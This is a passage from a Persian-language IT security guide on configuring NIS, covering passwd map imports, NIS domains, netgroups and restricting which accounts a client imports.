‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪ ،‬ﺍﮔﺮ ﺩﺍﺩﺓ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪:‬‬
‫‪root:si4NOjF9Q8JpE:0:Mr. Root:/:/bin/sh‬‬
‫‪+:‘:999:999:::‬‬
‫ﺁﻧﮕﺎﻩ ﻛﻠﻴﺔ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻧﮕﺎﺷﺖ ‪ passwd‬ﻣﺮﺑﻮﻁ ﺑﻪ ‪ NIS‬ﻭﺍﺭﺩ ﺧﻮﺍﻫﻨﺪ ﺷﺪ‪ ،‬ﺍﻣﺎ ﻫﺮﻳﻚ ﺩﺍﺭﺍﻱ ﺩﺍﺩﺓ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺧـﻮﺩ‬
‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻛﻪ ﺑﺎ "*" ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻩ ﻭ ﺍﺯ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺁﻥ ﺩﺭ ﻣﺎﺷﻴﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨـﺪ‪ .‬ﻫﻤـﺔ ‪UID‬ﻫـﺎ ﻭ‬
‫‪153 Network Information Service‬‬
‫‪154 Lightweight Directory Access Protocol‬‬
‫‪155 NIS Maps‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺨﻮﺍﻧﺪ ﺗـﺎ ﻳـﻚ ﺩﺭﺧﻮﺍﺳـﺖ ﺷـﺒﻜﻪ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻩﺷـﺪﻥ‬
‫ﻻ ﻧﮕﺎﺷﺖ ‪ passwd‬ﺍﺯ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺳـﺎﺧﺘﻪ‬
‫ﻧﮕﺎﺷﺖ ‪ passwd‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﻫﺮﭼﻨﺪ ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﻧﻴﺴﺖ‪ .‬ﻭﻗﺘﻲ ‪ NIS‬ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺍﻭﻟﻴﻦ ﺧﻂ ﻗﺎﺑﻞ ﺗﻄﺒﻴﻖ ﺑﺮﺳـﺪ‬
‫ﻛﺎﺭ ﺭﺍ ﻣﺘﻮﻗﻒ ﺧﻮﺍﻫﺪ ﻛﺮﺩ‪ .‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﻋﻤﻠﻴﺎﺕ ﺩﺭﻳﺎﻓﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺎ ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺑﻪ ﺑﻌﺪ ﺍﺯ ﻋﻼﻣﺖ "‪ "+‬ﺑﻪ‬
‫ﺗﻌﺪﺍﺩ ﺧﺎﺻﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﺎﺻﻲ ﺭﺍ ﺑﺎ ﮔﺬﺍﺷﺘﻦ ﺧﻄﻲ ﻛـﻪ ﺑـﺎ ﻋﻼﻣـﺖ ﺗﻔﺮﻳـﻖ )‪(-‬‬
‫ﺷﺮﻭﻉ ﻣﻲﺷﻮﺩ ﺍﺯ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻥ ﻣﺴﺘﺜﻨﻲ ﻛﻨﻴﺪ‪.‬‬
‫‪٣٣٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺳﺎﻣﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺮﺩﺍﺭﻳﺪ‪ ،‬ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻓﺎﻳﻞ‪ ،‬ﻣﺎﻟﻜﺎﻥ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎ ﺭﺍ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﺩﺍﺩﻩ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ‪ ~user‬ﺩﺭ ﭘﻮﺳﺘﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺑﺪﺭﺳﺘﻲ ﺷﺎﺧﺔ ﺧﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺭﺍ ﻧﮕﺎﺷﺖ ﻛﻨﻨﺪ )ﺑﺎ ﺍﻳﻦ ﻓﺮﺽ ﻛﻪ ﺁﻥ ﺷـﺎﺧﻪ‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ mount ،NFS‬ﺷﺪﻩ ﺍﺳﺖ(‪.‬‬
‫ﺩﺍﻣﻨﻪﻫﺎﻱ ‪NIS‬‬
‫ﻭﻗﺘﻲ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS‬ﺭﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻲﻛﻨﻴﺪ ﺑﺎﻳﺪ ﻳﻚ ﺩﺍﻣﻨﺔ ‪NIS‬‬
‫‪١٥٦‬‬
‫ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻳﻦ ﺩﺍﻣﻨﻪﻫﺎ ﻣﺸﺎﺑﻪ ﺩﺍﻣﻨﻪﻫـﺎﻱ ‪DNS‬‬
‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺩﺍﻣﻨﻪﻫﺎﻱ ‪ DNS‬ﻳﻚ ﻣﻨﻄﻘﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺩﺍﻣﻨﻪﻫﺎﻱ ‪ NIS‬ﻳﻚ ﮔﺮﻭﻩ ﺭﺍﻫﺒﺮﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﻣﻌـﻴﻦ‬
‫ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﻓﺮﻣﺎﻥ ‪ domainname‬ﺩﺭ ‪ Unix‬ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻭ ﺗﻐﻴﻴﺮ ﻧﺎﻡ ﻳﻚ ﺩﺍﻣﻨﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ‪ .‬ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻥ ﺗﻨﻬـﺎ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻳﻚ ﺩﺍﻣﻨﺔ ‪ NIS‬ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻫﺮ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺩﺍﻣﻨﻪﻫﺎﻱ ‪ NIS‬ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪.‬‬
‫ﺍﺯ ﺩﺍﻣﻨﺔ ﺍﻳﻨﺘﺮﻧﺖ ﺧﻮﺩ ﺑﻌﻨﻮﺍﻥ ﺩﺍﻣﻨﺔ "ﮔﺮﻭﻩ ﺷﺒﻜﻪ" ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪ .‬ﺗﻨﻈﻴﻢ ﺍﻳﻦ ﺩﻭ ﺩﺍﻣﻨﻪ ﺑﻪ ﻳﻚ ﻧﺎ ﹺﻡ ﻣـﺸﺎﺑﻪ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ ﻧﮕﺎﺭﺷـﻬﺎﻱ‬
‫‪ sendmail‬ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺗﻲ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺩﺍﻣﻨﺔ ‪ NIS‬ﻛﻪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺣـﺪﺱ ﺯﺩﻩ ﻣـﻲﺷـﻮﺩ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ‪ .‬ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﻧﻘﺎﻳﺺ ‪ NIS‬ﻭ ‪ NFS‬ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﻨﻨـﺪ ﺗﻘﺮﻳﺒـﹰﺎ ﻫﻤﻴـﺸﻪ ﻗﺒـﻞ ﺍﺯ ﻫـﺮ‬
‫ﺍﻧﺠﺎﻡ ﻫﺮ ﺗﻼﺷﻲ ﺳﻌﻲ ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪) .‬ﺍﻟﺒﺘﻪ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ‪ NIS‬ﻛﻤﺎﻛـﺎﻥ‬
‫ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮ ﻗﺎﺑﻞ ﺗﻌﻴﻴﻦ ﺍﺳﺖ‪(.‬‬
‫ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ‪NIS‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ ‪ ١٥٧NIS‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﮔﺮﻭﻫﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ‪ .‬ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ‬
‫ﺍﺻﻞ ﺷﺒﻴﻪ ﮔﺮﻭﻫﻬﺎﻱ ﻣﺤﻠﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻧﻬﺎ‪.‬‬
‫ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺳﺎﺩﻩﺳﺎﺯﻱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻭ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﺍﺷﺘﺒﺎﻩ ﺍﺳﺖ‪ .‬ﺑـﺎ ﻣـﺸﺨﺺ ﻛـﺮﺩﻥ ﻭ ﺍﺳـﺘﻔﺎﺩﺓ ﺻـﺤﻴﺢ ﺍﺯ‬
‫ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺍﻓﺮﺍﺩ ﻭ ﻣﺎﺷﻴﻨﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﻨﺎﺑﻊ ﺣﻴﺎﺗﻲ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﺳﻄﺢ ﺍﻳﻤﻨﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﺍﺩ‪.‬‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ‪ NIS‬ﺩﺭ ﻓﺎﻳﻞ ‪ /usr/etc/netgroup‬ﻳﺎ ‪ /etc/netgroup‬ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﺷـﻮﺩ‪.‬‬
‫ﺍﻳﻦ ﻓﺎﻳﻞ ﺷﺎﻣﻞ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺧﻂ ﺩﺭ ﻗﺎﻟﺐ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬
‫… ‪Groupname member1 member2‬‬
‫ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﻭ ﻳﻚ ﺩﺍﻣﻨﺔ ‪ NIS‬ﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ‪ .‬ﻗﺎﻟﺐ ﺍﻋﻀﺎ ﭼﻨﻴﻦ ﺍﺳﺖ‪:‬‬
‫)‪(hostname, username, domainname‬‬
‫ﺍﮔﺮ ﺟﺎﻱ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ )‪ (username‬ﺧﺎﻟﻲ ﺑﺎﺷﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻫﺮ ﻛﺎﺭﺑ ﹺﺮ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺩﺭ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﻋﻀﻮﻱ ﺍﺯ ﮔﺮﻭﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺟﺎﻱ ﻳﻚ ﻧﺎﻡ‬
‫‪١٥٨‬‬
‫ﺩﺍﻣﻨﻪ )‪ (domainname‬ﺧﺎﻟﻲ ﺑﺎﺷﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺩﺍﻣﻨﺔ ﺟﺎﺭﻱ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻧﺼﺐ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ‬
‫ﺑﺮﻧﺎﻣﺔ ‪) /etc/yp/makedbm‬ﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣﺴﻴﺮ ‪ /usr/etc/yp/makedbm‬ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ( ﻓﺎﻳﻞ ﮔﺮﻭﻩ ﺷـﺒﻜﻪ ﺭﺍ ﺩﺭ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻛﻪ ﺩﺭ ﻣﺴﻴﺮﻫﺎﻱ ﺯﻳﺮ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﭘﺮﺩﺍﺯﺵ ﻣﻲﻛﻨﺪ‪:‬‬
‫‪156 NIS Domain‬‬
‫‪157 NIS Netgroups‬‬
‫‪ ۱۵۸‬ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑﮕﻮﻧﻪﺍﻱ ﺳﺎﺧﺘﻪ ﺷﻮﻧﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻳﻚ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ(‪ ،‬ﻳـﺎ ﻳـﻚ ﻧـﺎﻡ‬
‫ﻣﻴﺰﺑﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻭﻟﻲ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻳﻚ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺍﺯ ﻣﻴﺰﺑﺎﻧﻬﺎ(‪ .‬ﺳﺎﺧﺘﻦ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑﻌﻀﻲ ﺍﺯ ﺍﻋﻀﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻫـﺴﺘﻨﺪ ﻭ ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﺍﻋﻀﺎ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺧﻄﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ‪.‬‬
‫‪٣٣١‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪/etc/yp/domainname/netgroup.dir‬‬
‫‪/etc/yp/domainname/netgroup.pag‬‬
‫‪/etc/yp/domainname/netgroup.byuser.dir‬‬
‫‪/etc/yp/domainname/netgroup.byuser.pag‬‬
‫‪/etc/yp/domainname/netgroup.byhost.dir‬‬
‫‪/etc/yp/domainname/netgroup.byhost.pag‬‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺑﻌﻀﻲ ﻣﺎﺷﻴﻨﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ‪ /etc/yp‬ﺑﺼﻮﺭﺕ ﺳﻤﺒﻠﻴﻚ ﺑﻪ ‪ /var/yp‬ﻟﻴﻨﻚ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﻛﻮﭼﻜﻲ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻨﻬـﺎ ﺩﻭ ﮔـﺮﻭﻩ ﺷـﺒﻜﻪ ﺑـﺴﺎﺯﻳﺪ؛ ﻳﻜـﻲ ﺑـﺮﺍﻱ ﻛﻠﻴـﺔ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﺩﻳﮕـﺮﻱ ﺑـﺮﺍﻱ ﻛﻠﻴـﺔ ﻣﺎﺷـﻴﻨﻬﺎﻱ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‪ .‬ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺍﻳﺠﺎﺩ ﻭ ﺭﺍﻫﺒﺮﻱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻼ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﮔﺮﻭﻩ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺮ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺑﺴﺎﺯﻳﺪ‪ .‬ﺁﻧﮕﺎﻩ ﻣـﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺰﺭﮔﺘﺮﻱ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭼﻨﺪ ﮔﺮﻭﻩ ﺑﺴﺎﺯﻳﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻳﻚ ﮔﺮﻭﻩ ﺍﺻﻠﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷﺎﻣﻞ ﻫﻤﺔ ﺯﻳﺮﮔﺮﻭﻫﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺎﺷﺪ‪ .‬ﺍﻟﺒﺘﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﻤﻴﻦ ﻛﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪.‬‬
‫ﻳﻚ ﺩﭘﺎﺭﺗﻤﺎﻥ ﻋﻠﻮﻡ ﺑﺎ ﺳﺎﺧﺘﺎﺭﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺧﺘﺎﺭ ﺯﻳﺮ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬
‫)‪Math (mathserve,,) (math1,,) (math2,,) (math3,,‬‬
‫)‪Chemistry (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,‬‬
‫)‪Biology (bioserve1,,) (bio1,,) (bio2,,) (bio3,,‬‬
‫‪Science Math Chemistry Biology‬‬
‫ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺍﺯ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻫﺴﺘﻨﺪ ﭼﻮﻥ ﺷﻤﺎ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛـﺮﺩﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻣﺎﺷـﻴﻨﻬﺎﻳﻲ ﻛـﻪ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﺓ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛـﺮﺩﻥ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﻭﺍﺭﺩ ﻣـﻲﺷـﻮﻧﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ‪ NFS‬ﺑـﺮﺍﻱ ﻣﺤـﺪﻭﺩ ﻛـﺮﺩﻥ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﻛـﺴﻲ ﺑـﻪ ‪partition‬ﻫـﺎ ﻭ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩ ﻧﻈﻴـﺮ‬
‫‪ /etc/passwd‬ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﺑﻬﺮﻩ ﺑﺒﺮﻳﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩﻛﺮﺩﻥ ﻭﺭﻭﺩ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺗﺴﻬﻴﻼﺕ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺑﻮﺳﻴﻠﺔ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﻭﺍﺭﺩ ﺷﺪﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻓﻘﻂ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻳﻚ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺧﺎﺹ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺍﺯ ﻋﻼﻣﺖ ﺟﻤﻊ )‪ (+‬ﻭ ﻳﻚ ﻧـﺸﺎﻧﻪ @ ﺑـﻪ‬
‫ﻫﻤﺮﺍﻩ ﻧﺎﻡ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴﺪ‪:‬‬
‫ﺩﺳﺘﻮﺭﺍﺕ ﺑﺎﻻ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺩﺭ ﮔﺮﻭﻩ ﻣﺘﺼﺪﻱﻫﺎ ﻓﻬﺮﺳﺖ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺍﺯ ﻧﮕﺎﺷﺖ ‪ NIS‬ﺑﻪ ﺣﺎﻓﻈﻪ ﻣﻨﺘﻘﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺍﮔـﺮ‬
‫ﺍﺳﺘﺜﻨﺎﻫﺎ ﺭﺍ ﻗﺒﻞ ﺍﺯ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﻓﻬﺮﺳﺖ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻋﻼﻣﺖ ﺗﻔﺮﻳﻖ )‪ (-‬ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺭﺍ ﻣـﺴﺘﺜﻨﻲ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻧﻤﺎﺩﻫﺎﻱ ‪ +@netgroup‬ﻭ ‪ -@netgroup‬ﺭﻭﻱ ﻫﻤﺔ ﻧﺴﺨﻪﻫﺎﻱ ‪ NIS‬ﻛﺎﺭ ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺗﺎ ﻛﻨﻮﻥ ﺭﻭﻱ ﺑﻘﻴﻪ ﻧﺴﺨﻪﻫﺎ ﻫـﻢ ﺑـﺼﻮﺭﺕ‬
